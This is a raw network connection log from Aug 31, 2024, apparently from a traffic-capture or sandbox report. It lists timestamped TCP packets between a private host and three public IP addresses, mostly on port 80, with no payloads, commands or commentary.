Aug 31, 2024 15:44:05.411601067 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411602974 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411624908 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411652088 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:06.061264992 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.061642885 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.066741943 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:06.066756010 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:06.066818953 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.066855907 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.066993952 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.071733952 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:06.807651997 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:06.807797909 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.809034109 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:06.813774109 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048937082 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048949957 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048959017 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048963070 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048969984 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048979044 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.048994064 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.049005985 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.049015045 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.049087048 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.049098969 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.049102068 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.049196959 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.054078102 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.054088116 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.054100037 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.054111004 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.054155111 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.054215908 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.135494947 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.135535955 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.135566950 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.135647058 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.198194027 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198231936 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198292017 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198307991 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198321104 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198331118 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198348045 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.198427916 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.198862076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198872089 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198883057 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198904991 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198915005 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.198916912 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.198940039 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.198959112 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.199748039 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.199758053 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.199768066 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.199780941 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.199791908 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.199799061 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.199815989 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.199834108 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.200588942 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.200598955 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.200609922 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.200649977 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.200651884 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.200663090 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.200685978 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.200714111 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.201394081 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.202662945 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.264447927 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.264457941 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.264468908 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.264575005 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.346863031 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.346873999 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.346940041 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.346981049 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347011089 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347028971 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347040892 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347050905 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347065926 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347090006 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347138882 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347178936 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347213030 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347258091 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347285986 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347304106 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347315073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347333908 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347352028 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347587109 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347598076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347609043 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347637892 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347656012 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347665071 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347666979 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347678900 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347686052 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.347702980 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.347722054 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.348465919 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348474979 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348493099 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348514080 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348520041 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.348526001 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348536968 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348542929 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.348547935 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348561049 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.348592997 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.349385977 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349397898 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349411011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349419117 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.349433899 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.349450111 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349461079 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349462986 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.349472046 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.349490881 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.349524021 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.350152969 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350164890 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350176096 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350184917 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350195885 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350197077 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.350207090 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350219011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350219011 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.350230932 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.350244999 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.350269079 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351022005 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351069927 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351072073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351083994 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351115942 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351134062 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351136923 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351145029 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351156950 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351172924 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351202011 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351711988 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351778030 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351789951 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351800919 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351816893 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351824999 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351828098 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.351850033 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.351881027 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.505842924 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505857944 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505872011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505894899 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505906105 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505913973 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505925894 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505924940 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.505955935 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.505987883 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.505999088 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506007910 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506020069 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506031990 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506031990 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506042957 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506052971 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506055117 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506067991 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506068945 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506095886 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506124973 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506266117 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506304979 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506311893 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506316900 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506347895 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506361961 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506380081 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506392002 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506406069 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506423950 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506424904 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506439924 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506470919 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506501913 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506514072 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506525040 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506542921 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506546974 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506556034 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506567001 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506581068 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.506582022 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506618023 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.506644011 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507214069 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507262945 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507356882 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507369041 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507380962 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507391930 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507402897 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507402897 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507421970 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507430077 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507433891 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507445097 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507457018 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507462025 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507468939 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507481098 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507482052 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507493019 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507498980 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507505894 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.507534027 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.507560968 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508275032 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508292913 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508305073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508325100 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508347988 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508348942 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508358002 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508361101 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508373022 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508384943 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508389950 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508411884 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508440018 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508488894 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508500099 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508512020 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508523941 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508534908 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508536100 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508548021 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508558035 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508559942 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.508605957 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.508626938 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509181976 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509193897 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509206057 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509223938 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509243011 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509247065 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509258032 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509258986 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509272099 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509284019 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509289980 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509305000 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509324074 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509355068 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509366035 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509383917 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509393930 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509396076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509407997 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509418964 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509428024 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509430885 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.509447098 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.509466887 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.510130882 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510173082 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.510204077 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510215998 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510226965 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510237932 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510247946 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.510251045 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.510266066 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.510299921 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.578727961 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:07.582274914 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582293034 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582303047 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582313061 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582324028 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582326889 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582354069 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582410097 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582457066 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582465887 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582475901 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582488060 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582495928 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582499981 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582519054 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582528114 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582537889 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582546949 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582562923 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582590103 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582684040 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582694054 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582706928 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582716942 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582724094 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582742929 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582767010 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.582776070 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.582823038 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.583580971 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:07.583658934 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:07.594103098 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:07.598948002 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:07.644706964 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644725084 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644735098 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644783020 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644803047 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644813061 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644875050 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644885063 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644917011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644927025 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644942999 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.644984961 CEST	49714	80	192.168.2.5	185.215.113.16
